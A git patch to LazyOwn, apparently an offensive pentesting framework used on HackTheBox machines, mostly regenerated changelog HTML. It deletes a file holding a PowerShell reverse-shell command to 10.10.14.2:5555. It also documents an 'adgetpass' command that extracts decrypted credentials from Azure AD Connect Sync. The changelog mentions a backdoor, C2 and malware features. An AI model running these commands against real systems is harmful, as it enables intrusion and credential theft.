From 60ae72817b46f1d5100a8b3372a2fb0b5e7a9495 Mon Sep 17 00:00:00 2001
From: gris
Date: Sat, 19 Oct 2024 18:24:04 -0300
Subject: [PATCH] feat(feat): monteverde machine \n\n Version: release/0.1.65
\n\n ad_getpass, some refactors. \n\n Modified file(s):\n- COMMANDS.md -
Invoke-PowerShellTcp.ps1 - README.md - docs/COMMANDS.html - docs/README.html
- docs/index.html - docs/index.html.bak - external/install_external.sh -
lazyown - modules/credentials.json - payload.json -
sessions/download_resources.sh\nDeleted file(s):\n-
Invoke-PowerShellTcp.ps1\n LazyOwn on HackTheBox:
https://app.hackthebox.com/teams/overview/6429 \n\n LazyOwn/
https://grisuno.github.io/LazyOwn/ \n\n \n\n Fecha: Sat Oct 19 01:10:29 2024
-0300 \n\n Hora: 1729311029
---
CHANGELOG.md | 7 +
COMMANDS.md | 17 +
Invoke-PowerShellTcp.ps1 | 1 -
README.md | 24 +
docs/CHANGELOG.html | 1240 ++++++++++++++++---------------
docs/COMMANDS.html | 14 +
docs/README.html | 1268 ++++++++++++++++----------------
docs/index.html | 1268 ++++++++++++++++----------------
docs/index.html.bak | 1252 +++++++++++++++----------------
external/install_external.sh | 3 +
lazyown | 193 ++++-
modules/credentials.json | 6 +
payload.json | 6 +-
sessions/download_resources.sh | 1 +
version.json | 2 +-
15 files changed, 2785 insertions(+), 2517 deletions(-)
delete mode 100644 Invoke-PowerShellTcp.ps1
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 306d095f..e0de7a36 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,13 @@
# Changelog
+### Nuevas características
+
+### Otros
+
+ * * feat(feat): monteverde machine \n\n Version: release/0.1.65 \n\n ad_getpass, some refactors. \n\n Modified file(s):\n- COMMANDS.md - Invoke-PowerShellTcp.ps1 - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - external/install_external.sh - lazyown - modules/credentials.json - payload.json - sessions/download_resources.sh\nDeleted file(s):\n- Invoke-PowerShellTcp.ps1\n LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 \n\n LazyOwn/ https://grisuno.github.io/LazyOwn/ \n\n \n\n Fecha: Sat Oct 19 01:10:29 2024 -0300 \n\n Hora: 1729311029
+
+
### Pruebas
### Otros
diff --git a/COMMANDS.md b/COMMANDS.md
index 781b29fe..da4cf4f0 100644
--- a/COMMANDS.md
+++ b/COMMANDS.md
@@ -6184,6 +6184,23 @@ Note:
- The method assumes that the session name is defined and accessible in
the scope where this method is called.
+## adgetpass
+Command adgetpass: Generates a PowerShell script to extract credentials from Azure AD Connect Sync.
+
+This function generates a PowerShell script based on user inputs, including the SQL server,
+database, and custom keyset values. The script retrieves encryption keys, decrypts credentials,
+and outputs the domain, username, and password from the AD Sync configuration.
+
+Args:
+ line (str): Optional argument to specify the server name, database name, and other options
+ in the following format: "server_name database_name keyset_id instance_id entropy".
+
+Returns:
+ None
+
+Example:
+ adgetpass MONTEVERDE ADSync 1 1852B527-DD4F-4ECF-B541-EFCCBFF29E31 194EC2FC-F186-46CF-B44D-071EB61F49CD
+
## find_tgts
Finds and returns a list of target hosts with port 445 open in the specified subnet.
diff --git a/Invoke-PowerShellTcp.ps1 b/Invoke-PowerShellTcp.ps1
deleted file mode 100644
index 9a60523b..00000000
--- a/Invoke-PowerShellTcp.ps1
+++ /dev/null
@@ -1 +0,0 @@
-Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 5555
diff --git a/README.md b/README.md
index 45500d43..e8077818 100644
--- a/README.md
+++ b/README.md
@@ -7774,6 +7774,23 @@ Note:
- The method assumes that the session name is defined and accessible in
the scope where this method is called.
+## adgetpass
+Command adgetpass: Generates a PowerShell script to extract credentials from Azure AD Connect Sync.
+
+This function generates a PowerShell script based on user inputs, including the SQL server,
+database, and custom keyset values. The script retrieves encryption keys, decrypts credentials,
+and outputs the domain, username, and password from the AD Sync configuration.
+
+Args:
+ line (str): Optional argument to specify the server name, database name, and other options
+ in the following format: "server_name database_name keyset_id instance_id entropy".
+
+Returns:
+ None
+
+Example:
+ adgetpass MONTEVERDE ADSync 1 1852B527-DD4F-4ECF-B541-EFCCBFF29E31 194EC2FC-F186-46CF-B44D-071EB61F49CD
+
## find_tgts
Finds and returns a list of target hosts with port 445 open in the specified subnet.
@@ -7993,6 +8010,13 @@ Helper function to alternate the case of characters in a string.
# Changelog
+### Pruebas
+
+### Otros
+
+ * * test(test): test \n\n Version: release/0.1.64 \n\n test \n\n Modified file(s):\n- README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - sessions/users.txt\n LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 \n\n LazyOwn/ https://grisuno.github.io/LazyOwn/ \n\n \n\n Fecha: Sat Oct 19 00:18:05 2024 -0300 \n\n Hora: 1729307885
+
+
### Pruebas
### Otros
diff --git a/docs/CHANGELOG.html b/docs/CHANGELOG.html
index 3165ff26..2ea702ad 100644
--- a/docs/CHANGELOG.html
+++ b/docs/CHANGELOG.html
@@ -173,10 +173,26 @@
CHANGELOG LazyOwn Framework Pentesting t00lz
Changelog
-Pruebas
+Nuevas características
Otros
+- feat(feat): monteverde machine Version: release/0.1.65 ad_getpass,
+some refactors. Modified file(s):- COMMANDS.md -
+Invoke-PowerShellTcp.ps1 - README.md - docs/COMMANDS.html -
+docs/README.html - docs/index.html - docs/index.html.bak -
+external/install_external.sh - lazyown - modules/credentials.json -
+payload.json - sessions/download_resources.shfile(s):-
+Invoke-PowerShellTcp.ps1LazyOwn on HackTheBox:
+https://app.hackthebox.com/teams/overview/6429 LazyOwn/
+https://grisuno.github.io/LazyOwn/ Fecha: Sat Oct 19 01:10:29 2024 -0300
+Hora: 1729311029
+
+
+Pruebas
+Otros
+
+
- test(test): test Version: release/0.1.64 test Modified file(s):-
README.md - docs/README.html - docs/index.html - docs/index.html.bak -
lazyown - sessions/users.txtLazyOwn on HackTheBox:
@@ -186,7 +202,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): test Version: release/0.1.64 test Modified file(s):-
@@ -200,7 +216,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): test Version: release/0.1.64 image banner responsive
@@ -212,7 +228,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): test Version: release/0.1.64 test Modified file(s):-
@@ -223,8 +239,8 @@
Otros
Hora: 1729219689
-Otros
Otros
+Otros
- feature(feat): new commands documented at COMMANDS.md Version:
@@ -241,7 +257,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): test Version: release/0.1.63 test Modified file(s):-
@@ -252,7 +268,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): no test Version: release/0.1.63 testing Modified
@@ -264,7 +280,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): test Version: release/0.1.63 test Modified file(s):-
@@ -277,7 +293,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): deply Version: release/0.1.63 new Modified file(s):-
@@ -289,7 +305,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): deploy Version: release/0.1.63 Modified file(s):-
@@ -303,7 +319,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): hashs Version: release/0.1.63 new logic of get
@@ -316,8 +332,8 @@
Otros
Hora: 1728890837
-Otros
Otros
+Otros
- feature(feat): new commands documented at COMMANDS.md Version:
@@ -331,8 +347,8 @@
Otros
Hora: 1728795132
-Otros
Otros
+Otros
- feature(feat): new commands like emp3r0r,
@@ -352,7 +368,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor of users.txt Version: release/0.1.61
@@ -367,7 +383,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor lazy_ruberdigispark isnto duckyspark
@@ -382,7 +398,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): trasnlated nmap script Version: release/0.1.61 and add
@@ -394,7 +410,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): nmap Version: release/0.1.61 nmap script was
@@ -406,15 +422,15 @@
Otros
Hora: 1728618761
-Otros
Otros
+Otros
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): New Feature Automate Arduino Attacks or AAA the command
@@ -427,8 +443,8 @@
Otros
Hora: 1728596519
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): finger_user_enum Version: release/0.1.60 new
@@ -441,8 +457,8 @@
Otros
Hora: 1728517885
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): trasnform Version: release/0.1.59 command documented at
@@ -455,7 +471,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): bug fixing Version: release/0.1.58 int the dunction do_ssh
@@ -468,7 +484,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): tags Version: release/0.1.57 xd Modified file(s):-
@@ -479,7 +495,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor de find y nc Version: release/0.1.56
@@ -492,8 +508,8 @@
Otros
Hora: 1728364614
-Otros
Otros
+Otros
- feature(feature & refactor): new commands and refactor Version:
@@ -510,8 +526,8 @@
Otros
Hora: 1728262185
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): automsf Version: release/0.1.55 new command documented
@@ -525,7 +541,7 @@
Otros
Pruebas
-Otros
+Otros
- test(new machine return): is a nice machine :P Version:
@@ -538,7 +554,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): new machine yummy.htb found a command in find to reverse
@@ -553,8 +569,8 @@
Otros
Hora: 1728144123
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): new attack mfscosole automated Version: release/0.1.54
@@ -569,7 +585,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): testing DEPLOY.sh script Version: release/0.1.53 to
@@ -583,7 +599,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): nueva documentacion comando evidence Version:
@@ -596,7 +612,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): lazyown infinite glitch storage Version: release/0.1.53
@@ -609,7 +625,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): fix in find command Version: release/0.1.53 command find
@@ -621,7 +637,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): refactor de credentials de evilwinrm de psexec,
@@ -635,8 +651,8 @@
Otros
Hora: 1727841476
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): eternalblue Version: release/0.1.52 and scanner in
@@ -649,7 +665,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): deleting users from ctf game from repo Version:
@@ -661,8 +677,8 @@
Otros
Hora: 1727751984
-Otros
Otros
+Otros
- feature(feat): new commands and functionalities Version:
@@ -676,7 +692,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): smbclient refactor, cme refactor, netexec,
@@ -695,8 +711,8 @@
Otros
Hora: 1727507083
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): new command Shadowsocks Version: release/0.1.50 with
@@ -708,8 +724,8 @@
Otros
Hora: 1727315985
-Otros
Otros
+Otros
- feature(feat): now we are vip Version: release/0.1.49 Modified
@@ -721,8 +737,8 @@
Otros
Hora: 1727071043
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): new commands documented at COMMANDS.md Version:
@@ -736,7 +752,7 @@
Otros
Pruebas
-Otros
+Otros
- test(testing): some test and new resources and externals scripst to
@@ -749,8 +765,8 @@
Otros
Hora: 1727047373
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): new cool stuff xD Version: release/0.1.47 parse id rsa
@@ -762,8 +778,8 @@
Otros
Hora: 1726349393
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(win backdoor): undetectable Version: release/0.1.46 handcrafted
@@ -776,7 +792,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): c2 insecure filename Version: release/0.1.45 resolved
@@ -788,7 +804,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): documented resources, and externals, and one command
@@ -802,8 +818,8 @@
Otros
Hora: 1726294213
-Otros
Otros
+Otros
- feature(new commands): documented at COMMANDS.md Version:
@@ -818,8 +834,8 @@
Otros
Hora: 1726123063
-Otros
Otros
+Otros
- feature(feat): new commands: scarecrow, createmail, eyewitness,
@@ -834,7 +850,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): install Version: release/0.1.42 dou you seaw [3~pip
@@ -847,7 +863,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): install Version: release/0.1.42 testing… Modified
@@ -859,8 +875,8 @@
Otros
Hora: 1725946883
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): graph Version: release/0.1.42 integrated at index2.html
@@ -872,8 +888,8 @@
Otros
Hora: 1725944061
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): 2 new commands Version: release/0.1.41 shellfire,
@@ -886,7 +902,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): install testing Version: release/0.1.40 reported by user
@@ -898,7 +914,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(hotfix): install wa broken Version: release/0.1.40 infinite
@@ -910,7 +926,7 @@
Otros
Pruebas
-Otros
+Otros
- test(testing): emire Version: release/0.1.39 empire xD Modified
@@ -923,7 +939,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): veil Version: release/0.1.39 new evasion tool testing
@@ -935,8 +951,8 @@
Otros
Hora: 1725781606
-Otros
Otros
+Otros
- feature(feat): now tord, trace, and generatedic to generate
@@ -951,7 +967,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): testing new feature tord Version: release/0.1.38
@@ -964,7 +980,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): ivy shellcodes test Version: release/0.1.38 new command
@@ -977,7 +993,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): new alias Version: release/0.1.38 new alias tor
@@ -990,7 +1006,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): corrections in text Version: release/0.1.38 and some
@@ -1002,7 +1018,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): new links Version: release/0.1.38 automatic download
@@ -1015,7 +1031,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): better docs Version: release/0.1.38 is zen now :)
@@ -1027,8 +1043,8 @@
Otros
Hora: 1725431518
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(fet): msfpc Version: release/0.1.38 automation Modified
@@ -1040,8 +1056,8 @@
Otros
Hora: 1725340514
-Otros
Otros
+Otros
- feature(feat): comandos nuevos documentados en commands.md Version:
@@ -1053,8 +1069,8 @@
Otros
Hora: 1725334465
-Otros
Otros
+Otros
- feature(feat): new command apache_users & new options -p to use
@@ -1071,7 +1087,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): documented malwarebazar Version: release/0.1.35 Fetches
@@ -1085,7 +1101,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): documentating Version: release/0.1.35 functions dacledit
@@ -1097,8 +1113,8 @@
Otros
Hora: 1725164019
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -1117,8 +1133,8 @@
Otros
Hora: 1725099704
-Otros
Otros
+Otros
- feature(feat): nuevos comandos documetados en COMMANDS.md Version:
@@ -1132,8 +1148,8 @@
Otros
Hora: 1725075210
-Otros
Otros
+Otros
- feature(feat): nuevos comandos documentados en COMMANDS.md Version:
@@ -1147,7 +1163,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(hotfix): deleted the insecure chat Version: release/0.1.32
@@ -1159,8 +1175,8 @@
Otros
Hora: 1725001084
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -1174,8 +1190,8 @@
Otros
Hora: 1724900538
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -1190,7 +1206,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): some fixes in c2 Version: release/0.1.29 now curl attack
@@ -1201,8 +1217,8 @@
Otros
Hora: 1724738020
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(kick): to kick from net some ip Version: release/0.1.28 seend
@@ -1215,8 +1231,8 @@
Otros
Hora: 1724734432
-Otros
Otros
+Otros
- feature(new command c2 documentad at COMMANDS.md): a little botnet
@@ -1230,7 +1246,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix auto exploit cacti rce logged): now the attack work
@@ -1242,8 +1258,8 @@
Otros
Hora: 1724653124
-Otros
Otros
+Otros
- feature(new commands docummented at COMMANDS.md): waybackmachine,
@@ -1257,8 +1273,8 @@
Otros
Hora: 1724556511
-Otros
Otros
+Otros
- feature(2 new attacks): docummented at COMMANDS.md Version:
@@ -1271,7 +1287,7 @@
Otros
Pruebas
-Otros
+Otros
- test(new machine): monitorsthree.htb Version: release/0.1.23
@@ -1283,7 +1299,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(new payload): in msfvenom Version: release/0.1.23 :) java
@@ -1294,8 +1310,8 @@
Otros
Hora: 1724478302
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(new feature): padbuster Version: release/0.1.23 new command
@@ -1308,7 +1324,7 @@
Otros
Documentación
-Otros
+Otros
- docs(documentacion): nueva versiòn en la web reflejada en el banner
@@ -1320,7 +1336,7 @@
Otros
Documentación
-Otros
+Otros
- docs(new documentation): better documentation to commands and utils
@@ -1332,8 +1348,8 @@
Otros
Hora: 1724470232
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(new feat in createdll): new option 3 to run automate create dll
@@ -1347,7 +1363,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): blazormalware corrected now functional and armed :)
@@ -1361,7 +1377,7 @@
Otros
Documentación
-Otros
+Otros
- docs(Lang): Translate README.md to English, enhancing clarity and
@@ -1380,8 +1396,8 @@
Otros
Hora: 1724221541
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(malware new): blazor malware Version: release/0.1.20 create
@@ -1394,7 +1410,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): se agrega la libreria colors en modules para
@@ -1409,8 +1425,8 @@
Otros
Hora: 1724134817
-Otros
Otros
+Otros
- feature(feat): dos comandos nuevos, skipfish y createdll, nuevo
@@ -1423,8 +1439,8 @@
Otros
Hora: 1724048452
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): create new command shellcode, run lazymsfvenom modified
@@ -1437,8 +1453,8 @@
Otros
Hora: 1724042153
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(new feat): new funcionality in proxy command, hexdump on
@@ -1451,8 +1467,8 @@
Otros
Hora: 1724029946
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): new prompt Version: release/0.1.16 now show the url of
@@ -1463,8 +1479,8 @@
Otros
Hora: 1724021178
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(feat): new command set_proxychains Version: release/0.1.15
@@ -1477,7 +1493,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(bug fixing): bug fixing in vars of DEPLOY.sh Version:
@@ -1488,8 +1504,8 @@
Otros
2024 -0400 Hora: 1724013443
-Otros
Otros
+Otros
- feature(new payload in msfvenom android): new options in msf rev
@@ -1502,7 +1518,7 @@
Otros
Documentación
-Otros
+Otros
- docs(documented): agradecimientos Version: release/0.1.12 a ✌ el
@@ -1513,8 +1529,8 @@
Otros
Hora: 1723891152
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(implement sicat libs): to ss command Version: release/0.1.12
@@ -1528,8 +1544,8 @@
Otros
Hora: 1723876813
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(some fixes): html and new patreon :) Version: release/0.1.11 :)
@@ -1540,8 +1556,8 @@
Otros
Hora: 1723859535
-Otros
Otros
+Otros
- feature(new tools): new commands, new payloads in find, new cves,
@@ -1555,8 +1571,8 @@
Otros
Hora: 1723841764
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(new feature): new command finalrecon docuemnted at COMMANDS.md
@@ -1569,8 +1585,8 @@
Otros
Hora: 1723791472
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(command): new commando swaks to abuse of smtp Version:
@@ -1583,7 +1599,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix in vpn): new machine Version: release/0.1.7 chenges in
@@ -1595,7 +1611,7 @@
Otros
Pruebas
-Otros
+Otros
- test(deleted files): index.sh y dump_readme.sh Version:
@@ -1608,7 +1624,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor DEPLOY, sessionstrace): se crea todo en un solo
@@ -1623,8 +1639,8 @@
Otros
Hora: 1723767303
-Otros
Otros
+Otros
- feature(sessionssh y sessionsshstrace): nuevos comandos documentados
@@ -1638,7 +1654,7 @@
Otros
Pruebas
-Otros
+Otros
- test(testing Changelog): new method to create changelog Version:
@@ -1649,8 +1665,8 @@
Otros
Hora: 1723761786
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(lazyscripts): se crea el comando y el directorio lazyscripts el
@@ -1663,8 +1679,8 @@
Otros
Hora: 1723760162
-Otros
Otros
+Otros
- feature(nuevos recursos, comandos, archivos tool para pwntomate): se
@@ -1681,8 +1697,8 @@
Otros
Hora: 1723713869
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(tool): nuevo tool a pwntomate medusa.tool Version:
@@ -1693,8 +1709,8 @@
Otros
Hora: 1723713306
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(medusa): nueco comando Version: release/0.1.2 para crackear
@@ -1706,7 +1722,7 @@
Otros
Documentación
-Otros
+Otros
- docs(changelog): reload Version: release/0.1.1 deleted -
@@ -1718,7 +1734,7 @@
Otros
Documentación
-Otros
+Otros
- docs(history): reload the history deleted by error holly git :P
@@ -1730,7 +1746,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): fix Version: release/0.1.1 fix - DEPLOY.sh - README.md -
@@ -1741,7 +1757,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): versionamiento Version: - DEPLOY.sh - README.md -
@@ -1752,7 +1768,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): fix en los tags Version: - README.md - docs/README.html -
@@ -1763,7 +1779,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(version file): Version: - README.md - docs/README.html -
@@ -1774,7 +1790,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(pandoc): command Version: bad arguments - DEPLOY.sh - README.md
@@ -1785,7 +1801,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): changelog Version: :D - DEPLOY.sh - README.md -
@@ -1796,7 +1812,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fixing): fixin bug in formating of changelog Version: :D -
@@ -1807,7 +1823,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fixing): fixing semantic version Version: implemented -
@@ -1819,7 +1835,7 @@
Otros
Nuevo Release
-Otros
+Otros
- release(release): tipo release Version: probandoe l tipo release -
@@ -1830,7 +1846,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(error en parametro): deploy en el pandocpara generar
@@ -1841,8 +1857,8 @@
Otros
Hora: 1723706284
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(cambio en el versionamiento semantico): se agregan release y
@@ -1855,7 +1871,7 @@
Otros
Nuevo parche
-Otros
+Otros
- patch(patching): prueba de nuevos tipos de commits Version: en este
@@ -1866,7 +1882,7 @@
Otros
Pruebas
-Otros
+Otros
- test(testind): deploy Version: release/0.1.0 test LazyOwn on
@@ -1875,8 +1891,8 @@
Otros
Hora: 1723703502
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(semantic versioning): se implementa el versionamiento semantico
@@ -1889,7 +1905,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(firma de commits con pgp): cree una firmita gpg para firmar los
@@ -1899,8 +1915,8 @@
Otros
Hora: 1723701172
-Otros
Otros
+Otros
- feature(test): testing deploy feature and semantic versioning
@@ -1911,7 +1927,7 @@
Otros
Pruebas
-Otros
+Otros
- test(deploy): testing deploy script Version: release/0.0.13 testing
@@ -1922,7 +1938,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(bug in Deploy): not updated the index.html file in deploys
@@ -1933,8 +1949,8 @@
Otros
Hora: 1723699864
-Otros
Otros
+Otros
- feature(mejoras y fixes): - se agrega un pequeño diccionario en el
@@ -1947,8 +1963,8 @@
Otros
Hora: 1723695184
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(add scripts): - adding scripts on sessions/win directory a nc
@@ -1960,7 +1976,7 @@
Otros
Documentación
-Otros
+Otros
- docs(add README.html to anchor tag in menu of index.html): - chenges
@@ -1972,7 +1988,7 @@
Otros
Documentación
-Otros
+Otros
- docs(mejora documentaciòn): se completan varios comandos con
@@ -1983,8 +1999,8 @@
Otros
Hora: 1723690831
-Otros
Otros
+Otros
- feature(cambios en script fast_run_as_r00t.sh): se agrega la opción
@@ -1997,7 +2013,7 @@
Otros
Documentación
-Otros
+Otros
- docs(test): bad tabs in index.html Version: release/0.0.13 LazyOwn
@@ -2007,7 +2023,7 @@
Otros
Documentación
-Otros
+Otros
- docs(cambio en index.html): tabulacion incorrecta del banner
@@ -2018,7 +2034,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): se cambia el nombre de readme.sh a
@@ -2030,7 +2046,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): test Version: release/0.0.13 test LazyOwn on HackTheBox:
@@ -2039,8 +2055,8 @@
Otros
Hora: 1723671536
-Otros
Otros
+Otros
- feature(actualizador de readme.md): con los nuevos cambios desde los
@@ -2052,7 +2068,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): new styles in html of documentation Version:
@@ -2063,7 +2079,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): testing changelog Version: release/0.0.13 LazyOwn on
@@ -2073,7 +2089,7 @@
Otros
Pruebas
-Otros
+Otros
- test(testing): new changelog format Version: release/0.0.13 new
@@ -2084,7 +2100,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): Version: release/0.0.13 test LazyOwn on HackTheBox:
@@ -2094,7 +2110,7 @@
Otros
Pruebas
-Otros
+Otros
- test(testeando): nuevo changelog Version: release/0.0.13 mejor
@@ -2105,7 +2121,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test): deploy Version: release/0.0.13 changes in changelog
@@ -2115,7 +2131,7 @@
Otros
Pruebas
-Otros
+Otros
- test(testing): changelog Version: release/0.0.13 saltos de linea
@@ -2125,7 +2141,7 @@
Otros
Pruebas
-Otros
+Otros
- test(tesing): saltos de linea en commit Version: release/0.0.13 :)
@@ -2135,7 +2151,7 @@
Otros
Documentación
-Otros
+Otros
- docs(class=“neon-text” on ul): :): release/0.0.13:)LazyOwn on
@@ -2145,7 +2161,7 @@
Otros
Pruebas
-Otros
+Otros
- test(commits con fecha y hora :P): probando el despliegue:
@@ -2156,7 +2172,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test de index.html): testeando el despliegue automatizado del
@@ -2166,7 +2182,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test index.sh): se realizan cambios en index.sh:
@@ -2177,7 +2193,7 @@
Otros
Pruebas
-Otros
+Otros
- test(testing): Testeando el flujo de trabajo en los despliegues
@@ -2186,8 +2202,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(versionamiento semantico en script de deploy): mejora en
@@ -2198,7 +2214,7 @@
Otros
Pruebas
-Otros
+Otros
- test(test of –no-test): and lolcat on clock command :Phas now
@@ -2209,7 +2225,7 @@
Otros
Documentación
-Otros
+Otros
- docs(se agrega el change log al readme): tambien se ejecutan pruebas
@@ -2221,7 +2237,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(fix in vpn): dont work with argumentsworks xD👽 LazyOwn on
@@ -2230,8 +2246,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(parametrizar el despliegue): se agrega el parametro –no-test
@@ -2242,7 +2258,7 @@
Otros
Pruebas
-Otros
+Otros
- test(troubleshooting): deleting the tmp file but i cant sleep👽
@@ -2252,7 +2268,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(delete qa command to option -c): bug: dont let beggin
@@ -2263,7 +2279,7 @@
Otros
Pruebas
-Otros
+Otros
- test(despliegue): backup file del archivo lazyown creado en las
@@ -2276,7 +2292,7 @@
Otros
Pruebas
-Otros
+Otros
- test(despliegue): de organizaciòn de archivos ovpn dentro del
@@ -2287,7 +2303,7 @@
Otros
Pruebas
-Otros
+Otros
- test(testmeneitor): probando el workflow de desplieguees el body de
@@ -2297,8 +2313,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(nuevo creador de index.html): crea el html de manera
@@ -2309,8 +2325,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(mejora CHANGELOG.sh): ahora actualiza usando
@@ -2321,8 +2337,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Nuevas características
-Otros
+Nuevas características
+Otros
- feat(mejorando el tipo): cambio en el script CHANGELOG.shmejora la
@@ -2333,7 +2349,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): El cierre de una imagen en la documentación estaba mal
@@ -2343,22 +2359,22 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- Nueva descripcion en el readme y probando el CHANGELOG.sh :)
-Otros
Otros
+Otros
- ahora el changelog a docs :D en formato html
-Otros
Otros
+Otros
- HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 Ahora
@@ -2369,8 +2385,8 @@
Otros
y CHANGELOG.sh :D 👽
-Otros
Otros
+Otros
